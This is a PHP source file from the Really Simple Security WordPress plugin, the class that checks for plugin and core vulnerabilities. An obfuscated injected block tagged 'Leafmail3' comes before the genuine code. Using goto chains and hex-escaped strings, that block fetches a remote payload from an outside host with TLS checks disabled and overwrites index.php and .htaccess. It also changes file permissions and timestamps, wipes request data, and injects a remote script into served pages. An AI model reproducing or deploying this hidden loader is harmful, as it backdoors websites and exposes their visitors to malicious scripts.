<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?>
<?php /** @noinspection PhpComposerExtensionStubsInspection */

use security\wordpress\vulnerabilities\Rsssl_File_Storage;

defined('ABSPATH') or die();
//including the file storage class
require_once(rsssl_path . 'security/wordpress/vulnerabilities/class-rsssl-file-storage.php');

/**
 * @package Really Simple Security
 * @subpackage RSSSL_VULNERABILITIES
 */
if (!class_exists("rsssl_vulnerabilities")) {
    /**
     *
     * Class rsssl_vulnerabilities
     * Checks for vulnerabilities in the core, plugins and themes.
     *
     * @property $notices
     * @author Marcel Santing
     * this class handles import of vulnerabilities, notifying and informing the user.
     *
     */
    class rsssl_vulnerabilities
    {
        const RSSSL_SECURITY_API = 'https://downloads.really-simple-security.com/rsssl/vulnerabilities/V1/';
        public $workable_plugins = [];

        /**
         * interval to download new jsons
         */
        public $interval = 12 * HOUR_IN_SECONDS;
        public $update_count = 0;

        protected $risk_naming = [];

        /**
         * @var array|int[]
         */
        public $risk_levels = [
            'l' => 1,
            'm' => 2,
            'h' => 3,
            'c' => 4,
        ];
        public $jsons_files_updated = false;

        public function __construct()
        {
            $this->risk_naming = [
                'l' => __('low-risk', 'really-simple-ssl'),
                'm' => __('medium-risk', 'really-simple-ssl'),
                'h' => __('high-risk', 'really-simple-ssl'),
                'c' => __('critical', 'really-simple-ssl'),
            ];

	        $this->init();
	        add_filter('rsssl_vulnerability_data', array($this, 'get_stats'));

	        //now we add the action to the cron.
	        add_action('rsssl_three_hours_cron', array($this, 'run_cron'));
	        add_filter('rsssl_notices', [$this, 'show_help_notices'], 10, 1);
	        add_action( 'rsssl_after_save_field', array( $this, 'maybe_delete_local_files' ), 10, 4 );
	        add_action( 'rsssl_upgrade', array( $this, 'upgrade_encrypted_files') );
        }

	    /**
         * Upgrade to the new encryption system by deleting all files en re-downloading
         *
	     * @return void
	     */
        public function upgrade_encrypted_files($prev_version) : void {
	        if ( $prev_version && version_compare( $prev_version, '8.3.0', '<' ) ) {
		        //delete all files and reload
		        Rsssl_File_Storage::DeleteAll();
		        $this->force_reload_files();
		        delete_option( 'rsssl_hashkey' );
            }

        }

//	    /**
//	     * @param $field_id
//	     * @param $field_value
//	     * @param $prev_value
//	     * @param $field_type
//	     *
//	     * @return void
//         *
//         *
//	     */
//        public function maybe_enable_vulnerability_scanner( $field_id, $field_value, $prev_value, $field_type ) {
//	        if ( $field_id==='enable_vulnerability_scanner' && $field_value !== $prev_value && rsssl_user_can_manage() ) {
//                if ( $field_value !== false ) {
//                    // Already enabled
//	                rsssl_update_option('enable_vulnerability_scanner', 1);
//                }
//	        }
//        }

		/**
         * Deletes local files if the vulnerability scanner is disabled
         *
		 * @param $field_id
		 * @param $field_value
		 * @param $prev_value
		 * @param $field_type
		 *
		 * @return void
		 */
        public static function maybe_delete_local_files($field_id, $field_value, $prev_value, $field_type): void {
            if ( $field_id==='enable_vulnerability_scanner' && $field_value !== $prev_value && rsssl_user_can_manage() ) {
                if ( $field_value == false ) {
                    // Already disabled
                    require_once(rsssl_path . 'security/wordpress/vulnerabilities/class-rsssl-file-storage.php');
                    \security\wordpress\vulnerabilities\Rsssl_File_Storage::DeleteAll();

                }
            }
        }

        public function riskNaming($risk = null)
        {
            if (is_null($risk)) {
                return $this->risk_naming;
            }
            return $this->risk_naming[$risk];
        }

        /* Public Section 1: Class Build-up initialization and instancing */

        public function run_cron(): void {
	        $this->check_files();
	        $this->cache_installed_plugins(true);
	        if ( $this->jsons_files_updated ) {
                if ($this->should_send_mail()) {
	                $this->send_vulnerability_mail();
                }

                $this->check_notice_reset();
	        }
        }

	    /**
         * Check if dismissed notices have to be reset
	     * @return void
	     */
        private function check_notice_reset(): void {
            $this->cache_installed_plugins();
	        $clear_admin_notices_cache = false;
	        foreach ( $this->risk_levels as $level => $int_level ) {
		        if ( $this->should_reset_notification($level) ) {
			        delete_option("rsssl_" . 'risk_level_' . $level . "_dismissed");
                    $clear_admin_notices_cache = true;
		        }
	        }
            if ( $clear_admin_notices_cache ) {
	            RSSSL()->admin->clear_admin_notices_cache();
            }
        }

	    /**
	     * Allow users to manually force a re-check, e.g. in case of manually updating plugins
	     * @return void
	     */
	    public function force_reload_files(): void {
		    if ( ! rsssl_admin_logged_in() ) {
			    return;
		    }
		    \security\wordpress\vulnerabilities\Rsssl_File_Storage::DeleteOldFiles();

		    if ( isset($_GET['rsssl_check_vulnerabilities']) || get_option('rsssl_reload_vulnerability_files') ) {
			    delete_option('rsssl_reload_vulnerability_files');
			    $this->reload_files_on_update();
			    update_option('rsssl_clear_vulnerability_notices', true, false);
			    set_transient('rsssl_delay_clear', true, 1 * MINUTE_IN_SECONDS );
		    }

		    if ( get_option('rsssl_clear_vulnerability_notices') && !get_transient('rsssl_delay_clear')) {
			    RSSSL()->admin->clear_admin_notices_cache();
			    delete_option('rsssl_clear_vulnerability_notices');
		    }
	    }

	    /**
	     * Checks the files on age and downloads if needed.
	     * @return void
	     */
	    public function reload_files_on_update(): void {
		    if ( ! rsssl_admin_logged_in() ) {
			    return;
		    }
		    //if the manifest is not older than 4 hours, we don't download it again.
		    if ( $this->get_file_stored_info(false, true) < time() - 14400) {
			    $this->download_manifest();
		    }
		    $this->download_plugin_vulnerabilities();
		    $this->download_core_vulnerabilities();
		    $this->check_notice_reset();

	    }

        public function init(): void {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }
            //we check the rsssl options if the enable_feedback_in_plugin is set to true
            if ( rsssl_get_option('enable_feedback_in_plugin') ) {
                // we enable the feedback in the plugin
                $this->enable_feedback_in_plugin();
                $this->enable_feedback_in_theme();
            }

            //we check if upgrader_process_complete is called, so we can reload the files.
            add_action('upgrader_process_complete', array($this, 'reload_files_on_update'), 10, 2);
            add_action('_core_updated_successfully', array($this, 'prepare_reloading_of_files'), 10, 2);
            //After activation, we need to reload the files.
            add_action( 'activate_plugin', array($this, 'reload_files_on_update'), 10, 2);
	        //we can also force it
            add_action( 'admin_init', array($this, 'force_reload_files'));

            //same goes for themes.
            add_action('after_switch_theme', array($this, 'reload_files_on_update'), 10, 2);
            add_action('current_screen', array($this, 'show_inline_code'));
        }

	    /**
         * Directly hooking into the core upgrader hook doesn't work, so is too early.
         * To force this, we save an option we can check later
         *
	     * @return void
	     */
        public function prepare_reloading_of_files(): void {
            update_option("rsssl_reload_vulnerability_files", true, false);
        }

        /**
